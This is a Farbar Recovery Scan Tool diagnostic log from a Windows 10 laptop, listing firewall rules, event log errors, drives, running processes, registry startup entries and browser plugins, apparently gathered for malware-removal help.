FirewallRules: [{C8C0F0F4-0183-4523-BC93-2E0D15D26F01}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{21F97557-5316-4375-84A5-0B7440C1C0D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{F23838C4-65A8-4FC7-B6C2-6B70C4E93033}] => (Allow) LPort=808
FirewallRules: [{B2A68B46-9A65-4A8E-B285-1E48E4A7B975}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{BF87AEAD-08C8-402A-835D-3474CD53CC70}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{39A33CB2-D099-4F9A-B02A-951093D131D3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1BA4519A-A342-4BB7-B7ED-08B0A6CC57F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{DDA3509A-3FD8-4C09-87F6-F4CB0C7DA6F4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1A44FB89-25DE-4E0A-A722-0E07C2162364}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0113C91F-F729-4DB8-8CD4-21A2E49DD8C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [TCP Query User{4E874D1D-1D1B-4AA1-BD8B-A789E8030874}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{A7DAE9F1-5ADA-449C-B077-BEAAEEBF82D2}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{86453128-7424-45D8-8978-BA280CCA1BC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
09-04-2016 10:34:10 Installed TurboTax 2015 wrapper
13-04-2016 20:21:09 Restore Point Created by FRST
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/14/2016 06:46:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 49.0.2623.112, time stamp: 0x57045c79
Faulting module name: chrome.exe, version: 49.0.2623.112, time stamp: 0x57045c79
Exception code: 0xc0000409
Fault offset: 0x00000000000800c0
Faulting process id: 0x1a08
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5
 
Error: (04/14/2016 06:41:48 PM) (Source: ESENT) (EventID: 489) (User: )
Description: SettingSyncHost (6132) An attempt to open the file "C:\Users\RoNiN\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb" for read only access failed with system error 32 (0x00000020): "The process cannot access the file because it is being used by another process. ".  The open file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:41:38 PM) (Source: ESENT) (EventID: 454) (User: )
Description: SettingSyncHost (6132) {AFFE6556-641B-404C-951F-EEC40F5CA4CD}: Database recovery/restore failed with unexpected error -1216.
 
Error: (04/14/2016 06:41:38 PM) (Source: ESENT) (EventID: 494) (User: )
Description: SettingSyncHost (6132) {AFFE6556-641B-404C-951F-EEC40F5CA4CD}: Database recovery failed with error -1216 because it encountered references to a database, 'C:\Users\RoNiN\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb', which is no longer present. The database was not brought to a Clean Shutdown state before it was removed (or possibly moved or renamed). The database engine will not permit recovery to complete for this instance until the missing database is re-instated. If the database is truly no longer available and no longer required, procedures for recovering from this error are available in the Microsoft Knowledge Base or by following the "more information" link at the bottom of this message.
 
Error: (04/14/2016 06:41:38 PM) (Source: ESENT) (EventID: 490) (User: )
Description: SettingSyncHost (6132) {AFFE6556-641B-404C-951F-EEC40F5CA4CD}: An attempt to open the file "C:\Users\RoNiN\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb" for read / write access failed with system error 32 (0x00000020): "The process cannot access the file because it is being used by another process. ".  The open file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:41:03 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (6132) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/14/2016 06:41:03 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (6132) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:40:52 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (6132) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/14/2016 06:40:52 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (6132) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:40:42 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (6132) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
 
System errors:
=============
Error: (04/14/2016 06:39:02 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Group Policy Client service, but this action failed with the following error: 
%%1056
 
Error: (04/14/2016 06:38:10 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (04/14/2016 06:37:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Group Policy Client service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
 
Error: (04/14/2016 06:37:02 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Resource Publication service which failed to start because of the following error: 
%%1070
 
Error: (04/14/2016 06:37:02 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Function Discovery Resource Publication service hung on starting.
 
Error: (04/14/2016 06:34:31 PM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!
 
Error: (04/14/2016 06:34:23 PM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/14/2016 06:34:56 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 5:55:47 PM on ‎4/‎14/‎2016 was unexpected.
 
Error: (04/13/2016 08:39:05 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Resource Publication service which failed to start because of the following error: 
%%1070
 
Error: (04/13/2016 08:39:05 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The SSDP Discovery service hung on starting.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 73%
Total physical RAM: 3885.5 MB
Available physical RAM: 1031.03 MB
Total Virtual: 3885.5 MB
Available Virtual: 46.11 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.91 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (14-04-2016 18:38:45)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealUpgrade\realupgrade.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
